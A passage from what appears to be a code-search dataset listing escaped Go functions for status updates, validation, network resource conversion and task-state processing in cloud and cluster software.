UpdateNetworkResponse{DefaultResponse: common.DefaultGcpResponse}, nil\n\tcase \"openstack\":\n\t\treturn UpdateNetworkResponse{DefaultResponse: common.DefaultOpResponse}, nil\n\tdefault:\n\t\treturn UpdateNetworkResponse{DefaultResponse: common.DefaultCloudResponse + \"NetworkUpdate\"}, nil\n\t}\n}", "func ValidateManagedSeedSetStatusUpdate(newManagedSeedSet, oldManagedSeedSet *seedmanagement.ManagedSeedSet) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tallErrs = append(allErrs, apivalidation.ValidateObjectMetaUpdate(&newManagedSeedSet.ObjectMeta, &oldManagedSeedSet.ObjectMeta, field.NewPath(\"metadata\"))...)\n\tallErrs = append(allErrs, ValidateManagedSeedSetStatus(&newManagedSeedSet.Status, newManagedSeedSet.Name, field.NewPath(\"status\"))...)\n\n\tstatusPath := field.NewPath(\"status\")\n\tif newManagedSeedSet.Status.NextReplicaNumber < oldManagedSeedSet.Status.NextReplicaNumber {\n\t\tallErrs = append(allErrs, field.Invalid(statusPath.Child(\"nextReplicaNumber\"), newManagedSeedSet.Status.NextReplicaNumber, \"cannot be decremented\"))\n\t}\n\tif isDecremented(newManagedSeedSet.Status.CollisionCount, oldManagedSeedSet.Status.CollisionCount) {\n\t\tvalue := pointer.Int32Deref(newManagedSeedSet.Status.CollisionCount, 0)\n\t\tallErrs = append(allErrs, field.Invalid(statusPath.Child(\"collisionCount\"), value, \"cannot be decremented\"))\n\t}\n\n\treturn allErrs\n}", "func (c *Contract) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (g *Group) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (m VMStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\t// value enum\n\tif err := m.validateVMStatusEnum(\"\", \"body\", m); err != nil {\n\t\treturn err\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func ValidateReplicaSetStatusUpdate(rs, oldRs *apps.ReplicaSet) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\tallErrs = append(allErrs, apivalidation.ValidateObjectMetaUpdate(&rs.ObjectMeta, &oldRs.ObjectMeta, field.NewPath(\"metadata\"))...)\n\tallErrs = append(allErrs, ValidateReplicaSetStatus(rs.Status, field.NewPath(\"status\"))...)\n\treturn allErrs\n}", "func (rule *VirtualNetworkRule) Initialize_From_VirtualNetworkRule_STATUS(source *VirtualNetworkRule_STATUS) error {\n\n\t// IgnoreMissingVNetServiceEndpoint\n\tif source.IgnoreMissingVNetServiceEndpoint != nil {\n\t\tignoreMissingVNetServiceEndpoint := *source.IgnoreMissingVNetServiceEndpoint\n\t\trule.IgnoreMissingVNetServiceEndpoint = &ignoreMissingVNetServiceEndpoint\n\t} else {\n\t\trule.IgnoreMissingVNetServiceEndpoint = nil\n\t}\n\n\t// Reference\n\tif source.Id != nil {\n\t\treference := genruntime.CreateResourceReferenceFromARMID(*source.Id)\n\t\trule.Reference = &reference\n\t} else {\n\t\trule.Reference = nil\n\t}\n\n\t// No error\n\treturn nil\n}", "func (igd *upnpIGD) updateStatus() error {\n\tskipDiscovery := igd.igdUrl != \"\"\n\tparams := []string{\"-s\"}\n\tif skipDiscovery {\n\t\tparams = []string{\"-url\", igd.igdUrl, \"-s\"} // -s has to be at the end for some reason\n\t}\n\tout, err := execTimeout(opTimeout, upnpcbe.Command(params...))\n\tif err != nil {\n\t\tif skipDiscovery {\n\t\t\t// Clear remembered url and try again\n\t\t\tigd.igdUrl = \"\"\n\t\t\treturn igd.updateStatus()\n\t\t} else {\n\t\t\treturn fmt.Errorf(\"Unable to call upnpc to get status: %s\\n%s\", err, out)\n\t\t}\n\t}\n\tresp := string(out)\n\tif igd.igdUrl, err = igd.extractFromStatusResponse(resp, IGD_URL_LABEL); err != nil {\n\t\treturn err\n\t}\n\tif igd.internalIP, err = igd.extractFromStatusResponse(resp, LOCAL_IP_ADDRESS_LABEL); err != nil {\n\t\treturn err\n\t}\n\tif igd.externalIP, err = igd.extractFromStatusResponse(resp, EXTERNAL_IP_ADDRESS_LABEL); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (t *Target) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (s *SocialSecurityNumber) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (in *NetworkStatus) DeepCopy() *NetworkStatus {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(NetworkStatus)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (network *VirtualNetwork_STATUS) ConvertStatusFrom(source genruntime.ConvertibleStatus) error {\n\tsrc, ok := source.(*v20201101s.VirtualNetwork_STATUS)\n\tif ok {\n\t\t// Populate our instance from source\n\t\treturn network.AssignProperties_From_VirtualNetwork_STATUS(src)\n\t}\n\n\t// Convert to an intermediate form\n\tsrc = &v20201101s.VirtualNetwork_STATUS{}\n\terr := src.ConvertStatusFrom(source)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"initial step of conversion in ConvertStatusFrom()\")\n\t}\n\n\t// Update our instance from src\n\terr = network.AssignProperties_From_VirtualNetwork_STATUS(src)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"final step of conversion in ConvertStatusFrom()\")\n\t}\n\n\treturn nil\n}", "func (network *VirtualNetwork) SetStatus(status genruntime.ConvertibleStatus) error {\n\t// If we have exactly the right type of status, assign it\n\tif st, ok := status.(*VirtualNetwork_STATUS); ok {\n\t\tnetwork.Status = *st\n\t\treturn nil\n\t}\n\n\t// Convert status to required version\n\tvar st VirtualNetwork_STATUS\n\terr := status.ConvertStatusTo(&st)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to convert status\")\n\t}\n\n\tnetwork.Status = st\n\treturn nil\n}", "func validateDaemonSetStatus(status *apps.DaemonSetStatus, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\tallErrs = append(allErrs, apivalidation.ValidateNonnegativeField(int64(status.CurrentNumberScheduled), fldPath.Child(\"currentNumberScheduled\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateNonnegativeField(int64(status.NumberMisscheduled), fldPath.Child(\"numberMisscheduled\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateNonnegativeField(int64(status.DesiredNumberScheduled), fldPath.Child(\"desiredNumberScheduled\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateNonnegativeField(int64(status.NumberReady), fldPath.Child(\"numberReady\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateNonnegativeField(status.ObservedGeneration, fldPath.Child(\"observedGeneration\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateNonnegativeField(int64(status.UpdatedNumberScheduled), fldPath.Child(\"updatedNumberScheduled\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateNonnegativeField(int64(status.NumberAvailable), fldPath.Child(\"numberAvailable\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateNonnegativeField(int64(status.NumberUnavailable), fldPath.Child(\"numberUnavailable\"))...)\n\tif status.CollisionCount != nil {\n\t\tallErrs = append(allErrs, apivalidation.ValidateNonnegativeField(int64(*status.CollisionCount), fldPath.Child(\"collisionCount\"))...)\n\t}\n\treturn allErrs\n}", "func (m *GrpcStatus) Validate() error {\n\tif m == nil {\n\t\treturn nil\n\t}\n\n\t// no validation rules for Status\n\n\treturn nil\n}", "func (m *NetStatusIPGroup) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func StatusValidator(s Status) error {\n\tswitch s {\n\tcase StatusWAITING, StatusIN_PROGRESS, StatusDONE, StatusERROR:\n\t\treturn nil\n\tdefault:\n\t\treturn fmt.Errorf(\"operation: invalid enum value for status field: %q\", s)\n\t}\n}", "func (network *VirtualNetwork) GetStatus() genruntime.ConvertibleStatus {\n\treturn &network.Status\n}", "func (m *ConnectionStatusSnapshotDTO) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validatePredictions(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (t *Task) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *Role) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (m *CrossConnectStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateCrossConnectID(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateInterfaceState(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateLightLevelIndBm(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateLightLevelIndicator(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (manager *SourceManager) ReceiveStatusUpdate(status DestinationTransferStatus) SourceTransferStatus {\n\n\tif status.Failed != \"\" {\n\t\tmanager.status.Failed = status.Failed\n\t\tmanager.err = errors.New(status.Failed)\n\t}\n\n\t// Record the number of packets the destination is requesting to be resent\n\tmanager.stats.RecordResentDestinationPackets(\n\t\tlen(status.DestinationPacketerStatus.ResendPackets))\n\n\t// Tell the packeter about it's counterpart's status. The packeter then\n\t// return's it's status, which will be sent by the TCPer on it's next iteration.\n\tmanager.status.SourcePacketerStatus = manager.packeter.ReceivePacketerStatusUpdate(\n\t\tstatus.DestinationPacketerStatus)\n\n\t// Record the number of packets the source is requesting to be resent\n\tmanager.stats.RecordResentSourcePackets(\n\t\tlen(manager.status.SourcePacketerStatus.ResendPackets))\n\n\t// All signature packets have been decoded, call SignatureDone\n\tif status.LastSignaturePacket != 0 &&\n\t\tmanager.packeter.LastPacketDecoded >= status.LastSignaturePacket &&\n\t\t!manager.signatureClosed {\n\t\tmanager.SignatureDone()\n\t}\n\n\tif status.PatchDone {\n\t\tmanager.PatchDone()\n\t}\n\n\treturn *manager.status\n}", "func (m *Status) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateCreated(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateUpdated(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateCreator(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateStatus(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (p *Photo) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (mt *Status) Validate() (err error) {\n\tif mt.Commit == \"\" {\n\t\terr = goa.MergeErrors(err, goa.MissingAttributeError(`response`, \"commit\"))\n\t}\n\tif mt.BuildTime == \"\" {\n\t\terr = goa.MergeErrors(err, goa.MissingAttributeError(`response`, \"buildTime\"))\n\t}\n\tif mt.StartTime == \"\" {\n\t\terr = goa.MergeErrors(err, goa.MissingAttributeError(`response`, \"startTime\"))\n\t}\n\tif mt.DatabaseStatus == \"\" {\n\t\terr = goa.MergeErrors(err, goa.MissingAttributeError(`response`, \"databaseStatus\"))\n\t}\n\tif mt.ConfigurationStatus == \"\" {\n\t\terr = goa.MergeErrors(err, goa.MissingAttributeError(`response`, \"configurationStatus\"))\n\t}\n\treturn\n}", "func (s *Single) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func RunPropertyAssignmentTestForServers_VirtualNetworkRule_STATUS(subject Servers_VirtualNetworkRule_STATUS) string {\n\t// Copy subject to make sure assignment doesn't modify it\n\tcopied := subject.DeepCopy()\n\n\t// Use AssignPropertiesTo() for the first stage of conversion\n\tvar other v20211101s.Servers_VirtualNetworkRule_STATUS\n\terr := copied.AssignProperties_To_Servers_VirtualNetworkRule_STATUS(&other)\n\tif err != nil {\n\t\treturn err.Error()\n\t}\n\n\t// Use AssignPropertiesFrom() to convert back to our original type\n\tvar actual Servers_VirtualNetworkRule_STATUS\n\terr = actual.AssignProperties_From_Servers_VirtualNetworkRule_STATUS(&other)\n\tif err != nil {\n\t\treturn err.Error()\n\t}\n\n\t// Check for a match\n\tmatch := cmp.Equal(subject, actual, cmpopts.EquateEmpty())\n\tif !match {\n\t\tactualFmt := pretty.Sprint(actual)\n\t\tsubjectFmt := pretty.Sprint(subject)\n\t\tresult := diff.Diff(subjectFmt, actualFmt)\n\t\treturn result\n\t}\n\n\treturn \"\"\n}", "func (r *Unit) ValidateUpdate(old runtime.Object) error {\n\tunitlog.Info(\"validate update\", \"name\", r.Name)\n\n\t// TODO(user): fill in your validation logic upon object update.\n\treturn nil\n}", "func (m *MsgUpdateStatusRequest) ValidateBasic() error {\n\tif m.From == \"\" {\n\t\treturn sdkerrors.Wrap(ErrorInvalidMessage, \"from cannot be empty\")\n\t}\n\tif _, err := hubtypes.ProvAddressFromBech32(m.From); err != nil {\n\t\treturn sdkerrors.Wrap(ErrorInvalidMessage, err.Error())\n\t}\n\tif m.ID == 0 {\n\t\treturn sdkerrors.Wrap(ErrorInvalidMessage, \"id cannot be zero\")\n\t}\n\tif !m.Status.IsOneOf(hubtypes.StatusActive, hubtypes.StatusInactive) {\n\t\treturn sdkerrors.Wrap(ErrorInvalidMessage, \"status must be one of [active, inactive]\")\n\t}\n\n\treturn nil\n}", "func (in *ManagedCluster) ValidateUpdate(old runtime.Object) error {\n\treturn nil\n}", "func (vns *VirtualNetworkService) Update(ctx context.Context, vn resources.VirtualNetwork,\n\tblueprint blueprint.Interface, updateType UpdateType) (*resources.VirtualNetwork, error) {\n\tvnID, err := vn.ID()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tblueprintText, err := blueprint.Render()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresArr, err := vns.call(ctx, \"one.vn.update\", vnID, blueprintText, updateType)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn vns.RetrieveInfo(ctx, int(resArr[resultIndex].ResultInt()))\n}", "func RunPropertyAssignmentTestForVirtualNetworks_VirtualNetworkPeering_STATUS(subject VirtualNetworks_VirtualNetworkPeering_STATUS) string {\n\t// Copy subject to make sure assignment doesn't modify it\n\tcopied := subject.DeepCopy()\n\n\t// Use AssignPropertiesTo() for the first stage of conversion\n\tvar other v20201101s.VirtualNetworks_VirtualNetworkPeering_STATUS\n\terr := copied.AssignProperties_To_VirtualNetworks_VirtualNetworkPeering_STATUS(&other)\n\tif err != nil {\n\t\treturn err.Error()\n\t}\n\n\t// Use AssignPropertiesFrom() to convert back to our original type\n\tvar actual VirtualNetworks_VirtualNetworkPeering_STATUS\n\terr = actual.AssignProperties_From_VirtualNetworks_VirtualNetworkPeering_STATUS(&other)\n\tif err != nil {\n\t\treturn err.Error()\n\t}\n\n\t// Check for a match\n\tmatch := cmp.Equal(subject, actual, cmpopts.EquateEmpty())\n\tif !match {\n\t\tactualFmt := pretty.Sprint(actual)\n\t\tsubjectFmt := pretty.Sprint(subject)\n\t\tresult := diff.Diff(subjectFmt, actualFmt)\n\t\treturn result\n\t}\n\n\treturn \"\"\n}", "func (o *IpamNetworkDataData) SetNetworkIsValid(v string) {\n\to.NetworkIsValid = &v\n}", "func (t *Thing) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func validateNetwork(t *testing.T, workingDir string) {\n\tterraformOptions := test_structure.LoadTerraformOptions(t, workingDir)\n\n\tsubnetNames := terraformOptions.Vars[\"subnet_names\"].([]interface{})\n\n\toutput := terraform.Output(t, terraformOptions, \"network_id\")\n\tassert.NotEmpty(t, output, \"network_id is empty\")\n\n\tsubnets := terraform.OutputList(t, terraformOptions, \"subnet_ids\")\n\tassert.Len(t, subnets, len(subnetNames), \"`subnet_ids` length is invalid\")\n\n\taddresses := terraform.OutputList(t, terraformOptions, \"subnet_address_ranges\")\n\tassert.Len(t, addresses, len(subnetNames), \"`subnet_address_ranges` length is invalid\")\n\n\t// check addresses\n\tfor _, cidr := range addresses {\n\t\t_, _, err := net.ParseCIDR(cidr)\n\t\tassert.Nil(t, err, \"net.ParseCIDR\")\n\t}\n}", "func (r *NodeReconciler) updateStatus(ctx context.Context, node *ethereumv1alpha1.Node, enodeURL string) error {\n\tnode.Status.EnodeURL = enodeURL\n\n\tif err := r.Status().Update(ctx, node); err != nil {\n\t\tr.Log.Error(err, \"unable to update node status\")\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (o *IpamNetworkDataData) GetNetworkIsValidOk() (*string, bool) {\n\tif o == nil || o.NetworkIsValid == nil {\n\t\treturn nil, false\n\t}\n\treturn o.NetworkIsValid, true\n}", "func (p *statusUpdate) ProcessStatusUpdate(\n\tctx context.Context,\n\tupdateEvent *statusupdate.Event,\n) error {\n\tvar currTaskResourceUsage map[string]float64\n\tp.logTaskMetrics(updateEvent)\n\n\tisOrphanTask, taskInfo, err := p.isOrphanTaskEvent(ctx, updateEvent)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif isOrphanTask {\n\t\tp.metrics.SkipOrphanTasksTotal.Inc(1)\n\t\ttaskInfo := &pb_task.TaskInfo{\n\t\t\tRuntime: &pb_task.RuntimeInfo{\n\t\t\t\tState: updateEvent.State(),\n\t\t\t\tMesosTaskId: updateEvent.MesosTaskID(),\n\t\t\t\tAgentID: updateEvent.AgentID(),\n\t\t\t},\n\t\t}\n\n\t\t// Kill the orphan task\n\t\tfor i := 0; i < _numOrphanTaskKillAttempts; i++ {\n\t\t\terr = jobmgr_task.KillOrphanTask(ctx, p.lm, taskInfo)\n\t\t\tif err == nil {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\ttime.Sleep(_waitForRetryOnErrorOrphanTaskKill)\n\t\t}\n\t\treturn nil\n\t}\n\n\t// whether to skip or not if instance state is similar before and after\n\tif isDuplicateStateUpdate(taskInfo, updateEvent) {\n\t\treturn nil\n\t}\n\n\tif updateEvent.State() == pb_task.TaskState_RUNNING &&\n\t\ttaskInfo.GetConfig().GetVolume() != nil &&\n\t\tlen(taskInfo.GetRuntime().GetVolumeID().GetValue()) != 0 {\n\t\t// Update volume state to be CREATED upon task RUNNING.\n\t\tif err := p.updatePersistentVolumeState(ctx, taskInfo); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tnewRuntime := proto.Clone(taskInfo.GetRuntime()).(*pb_task.RuntimeInfo)\n\n\t// Persist the reason and message for mesos updates\n\tnewRuntime.Message = updateEvent.StatusMsg()\n\tnewRuntime.Reason = \"\"\n\n\t// Persist healthy field if health check is enabled\n\tif taskInfo.GetConfig().GetHealthCheck() != nil {\n\t\treason := updateEvent.Reason()\n\t\thealthy := updateEvent.Healthy()\n\t\tp.persistHealthyField(updateEvent.State(), reason, healthy, newRuntime)\n\t}\n\n\t// Update FailureCount\n\tupdateFailureCount(updateEvent.State(), taskInfo.GetRuntime(), newRuntime)\n\n\tswitch updateEvent.State() {\n\tcase pb_task.TaskState_FAILED:\n\t\treason := updateEvent.Reason()\n\t\tmsg := updateEvent.Message()\n\t\tif reason == mesos.TaskStatus_REASON_TASK_INVALID.String() &&\n\t\t\tstrings.Contains(msg, _msgMesosDuplicateID) {\n\t\t\tlog.WithField(\"task_id\", updateEvent.TaskID()).\n\t\t\t\tInfo(\"ignoring duplicate task id failure\")\n\t\t\treturn nil\n\t\t}\n\t\tnewRuntime.Reason = reason\n\t\tnewRuntime.State = updateEvent.State()\n\t\tnewRuntime.Message = msg\n\t\t// TODO p2k: can we build TerminationStatus from PodEvent?\n\t\ttermStatus := &pb_task.TerminationStatus{\n\t\t\tReason: pb_task.TerminationStatus_TERMINATION_STATUS_REASON_FAILED,\n\t\t}\n\t\tif code, err := taskutil.GetExitStatusFromMessage(msg); err == nil {\n\t\t\ttermStatus.ExitCode = code\n\t\t} else if yarpcerrors.IsNotFound(err) == false {\n\t\t\tlog.WithField(\"task_id\", updateEvent.TaskID()).\n\t\t\t\tWithField(\"error\", err).\n\t\t\t\tDebug(\"Failed to extract exit status from message\")\n\t\t}\n\t\tif sig, err := taskutil.GetSignalFromMessage(msg); err == nil {\n\t\t\ttermStatus.Signal = sig\n\t\t} else if yarpcerrors.IsNotFound(err) == false {\n\t\t\tlog.WithField(\"task_id\", updateEvent.TaskID()).\n\t\t\t\tWithField(\"error\", err).\n\t\t\t\tDebug(\"Failed to extract termination signal from message\")\n\t\t}\n\t\tnewRuntime.TerminationStatus = termStatus\n\n\tcase pb_task.TaskState_LOST:\n\t\tnewRuntime.Reason = updateEvent.Reason()\n\t\tif util.IsPelotonStateTerminal(taskInfo.GetRuntime().GetState()) {\n\t\t\t// Skip LOST status update if current state is terminal state.\n\t\t\tlog.WithFields(log.Fields{\n\t\t\t\t\"task_id\": updateEvent.TaskID(),\n\t\t\t\t\"db_task_runtime\": taskInfo.GetRuntime(),\n\t\t\t\t\"task_status_event\": updateEvent.MesosTaskStatus(),\n\t\t\t}).Debug(\"skip reschedule lost task as it is already in terminal state\")\n\t\t\treturn nil\n\t\t}\n\t\tif taskInfo.GetRuntime().GetGoalState() == pb_task.TaskState_KILLED {\n\t\t\t// Do not take any action for killed tasks, just mark it killed.\n\t\t\t// Same message will go to resource manager which will release the placement.\n\t\t\tlog.WithFields(log.Fields{\n\t\t\t\t\"task_id\": updateEvent.TaskID(),\n\t\t\t\t\"db_task_runtime\": taskInfo.GetRuntime(),\n\t\t\t\t\"task_status_event\": updateEvent.MesosTaskStatus(),\n\t\t\t}).Debug(\"mark stopped task as killed due to LOST\")\n\t\t\tnewRuntime.State = pb_task.TaskState_KILLED\n\t\t\tnewRuntime.Message = \"Stopped task LOST event: \" + updateEvent.StatusMsg()\n\t\t\tbreak\n\t\t}\n\n\t\tif taskInfo.GetConfig().GetVolume() != nil &&\n\t\t\tlen(taskInfo.GetRuntime().GetVolumeID().GetValue()) != 0 {\n\t\t\t// Do not reschedule stateful task. Storage layer will decide\n\t\t\t// whether to start or replace this task.\n\t\t\tnewRuntime.State = pb_task.TaskState_LOST\n\t\t\tbreak\n\t\t}\n\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"task_id\": updateEvent.TaskID(),\n\t\t\t\"db_task_runtime\": taskInfo.GetRuntime(),\n\t\t\t\"task_status_event\": updateEvent.MesosTaskStatus(),\n\t\t}).Info(\"reschedule lost task if needed\")\n\n\t\tnewRuntime.State = pb_task.TaskState_LOST\n\t\tnewRuntime.Message = \"Task LOST: \" + updateEvent.StatusMsg()\n\t\tnewRuntime.Reason = updateEvent.Reason()\n\n\t\t// Calculate resource usage for TaskState_LOST using time.Now() as\n\t\t// completion time\n\t\tcurrTaskResourceUsage = getCurrTaskResourceUsage(\n\t\t\tupdateEvent.TaskID(), updateEvent.State(), taskInfo.GetConfig().GetResource(),\n\t\t\ttaskInfo.GetRuntime().GetStartTime(),\n\t\t\tnow().UTC().Format(time.RFC3339Nano))\n\n\tdefault:\n\t\tnewRuntime.State = updateEvent.State()\n\t}\n\n\tcachedJob := p.jobFactory.AddJob(taskInfo.GetJobId())\n\t// Update task start and completion timestamps\n\tif newRuntime.GetState() == pb_task.TaskState_RUNNING {\n\t\tif updateEvent.State() != taskInfo.GetRuntime().GetState() {\n\t\t\t// StartTime is set at the time of first RUNNING event\n\t\t\t// CompletionTime may have been set (e.g. task has been set),\n\t\t\t// which could make StartTime larger than CompletionTime.\n\t\t\t// Reset CompletionTime every time a task transits to RUNNING state.\n\t\t\tnewRuntime.StartTime = now().UTC().Format(time.RFC3339Nano)\n\t\t\tnewRuntime.CompletionTime = \"\"\n\t\t\t// when task is RUNNING, reset the desired host field. Therefore,\n\t\t\t// the task would be scheduled onto a different host when the task\n\t\t\t// restarts (e.g due to health check or fail retry)\n\t\t\tnewRuntime.DesiredHost = \"\"\n\n\t\t\tif len(taskInfo.GetRuntime().GetDesiredHost()) != 0 {\n\t\t\t\tp.metrics.TasksInPlacePlacementTotal.Inc(1)\n\t\t\t\tif taskInfo.GetRuntime().GetDesiredHost() == taskInfo.GetRuntime().GetHost() {\n\t\t\t\t\tp.metrics.TasksInPlacePlacementSuccess.Inc(1)\n\t\t\t\t} else {\n\t\t\t\t\tlog.WithField(\"job_id\", taskInfo.GetJobId().GetValue()).\n\t\t\t\t\t\tWithField(\"instance_id\", taskInfo.GetInstanceId()).\n\t\t\t\t\t\tInfo(\"task fail to place on desired host\")\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t} else if util.IsPelotonStateTerminal(newRuntime.GetState()) &&\n\t\tcachedJob.GetJobType() == pbjob.JobType_BATCH {\n\t\t// only update resource count when a batch job is in terminal state\n\t\tcompletionTime := now().UTC().Format(time.RFC3339Nano)\n\t\tnewRuntime.CompletionTime = completionTime\n\n\t\tcurrTaskResourceUsage = getCurrTaskResourceUsage(\n\t\t\tupdateEvent.TaskID(), updateEvent.State(), taskInfo.GetConfig().GetResource(),\n\t\t\ttaskInfo.GetRuntime().GetStartTime(), completionTime)\n\n\t\tif len(currTaskResourceUsage) > 0 {\n\t\t\t// current task resource usage was updated by this event, so we should\n\t\t\t// add it to aggregated resource usage for the task and update runtime\n\t\t\taggregateTaskResourceUsage := taskInfo.GetRuntime().GetResourceUsage()\n\t\t\tif len(aggregateTaskResourceUsage) > 0 {\n\t\t\t\tfor k, v := range currTaskResourceUsage {\n\t\t\t\t\taggregateTaskResourceUsage[k] += v\n\t\t\t\t}\n\t\t\t\tnewRuntime.ResourceUsage = aggregateTaskResourceUsage\n\t\t\t}\n\t\t}\n\t} else if cachedJob.GetJobType() == pbjob.JobType_SERVICE {\n\t\t// for service job, reset resource usage\n\t\tcurrTaskResourceUsage = nil\n\t\tnewRuntime.ResourceUsage = nil\n\t}\n\n\t// Update the task update times in job cache and then update the task runtime in cache and DB\n\tcachedJob.SetTaskUpdateTime(updateEvent.Timestamp())\n\tif _, err = cachedJob.CompareAndSetTask(\n\t\tctx,\n\t\ttaskInfo.GetInstanceId(),\n\t\tnewRuntime,\n\t\tfalse,\n\t); err != nil {\n\t\tlog.WithError(err).\n\t\t\tWithFields(log.Fields{\n\t\t\t\t\"task_id\": updateEvent.TaskID(),\n\t\t\t\t\"state\": updateEvent.State().String()}).\n\t\t\tError(\"Fail to update runtime for taskID\")\n\t\treturn err\n\t}\n\n\t// Enqueue task to goal state\n\tp.goalStateDriver.EnqueueTask(\n\t\ttaskInfo.GetJobId(),\n\t\ttaskInfo.GetInstanceId(),\n\t\ttime.Now())\n\t// Enqueue job to goal state as well\n\tgoalstate.EnqueueJobWithDefaultDelay(\n\t\ttaskInfo.GetJobId(), p.goalStateDriver, cachedJob)\n\n\t// Update job's resource usage with the current task resource usage.\n\t// This is a noop in case currTaskResourceUsage is nil\n\t// This operation is not idempotent. So we will update job resource usage\n\t// in cache only after successfully updating task resource usage in DB\n\t// In case of errors in PatchTasks(), ProcessStatusUpdate will be retried\n\t// indefinitely until errors are resolved.\n\tcachedJob.UpdateResourceUsage(currTaskResourceUsage)\n\treturn nil\n}", "func (c *FakeAWSSNSTargets) UpdateStatus(ctx context.Context, aWSSNSTarget *v1alpha1.AWSSNSTarget, opts v1.UpdateOptions) (*v1alpha1.AWSSNSTarget, error) {\n\tobj, err := c.Fake.\n\t\tInvokes(testing.NewUpdateSubresourceAction(awssnstargetsResource, \"status\", c.ns, aWSSNSTarget), &v1alpha1.AWSSNSTarget{})\n\n\tif obj == nil {\n\t\treturn nil, err\n\t}\n\treturn obj.(*v1alpha1.AWSSNSTarget), err\n}", "func (r *Review) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (c *AKSCluster) UpdateStatus(status string) error {\n\treturn c.modelCluster.UpdateStatus(status)\n}", "func ValidateNetworks(Validations Validations, Service types.ServiceConfig) error {\n\tfor Network := range Service.Networks {\n\t\tif !goutil.StringInSlice(Network, Validations.Networks) {\n\t\t\treturn fmt.Errorf(\"Network '%s' not in the whitelist\", Network)\n\t\t}\n\t}\n\treturn nil\n}", "func (m *OperationV1Status) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateFailure(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateOperationID(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateOperationType(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateStatus(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateSuccess(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (cluster *Cluster) ValidateUpdate(old runtime.Object) error {\n\tklog.Info(\"validate update\", \"name\", cluster.Name)\n\treturn nil\n}", "func (m *InterfaceProtocolConfigIPV4DhcpStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateState(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (e *ExternalCfp) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (t *Test1) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) 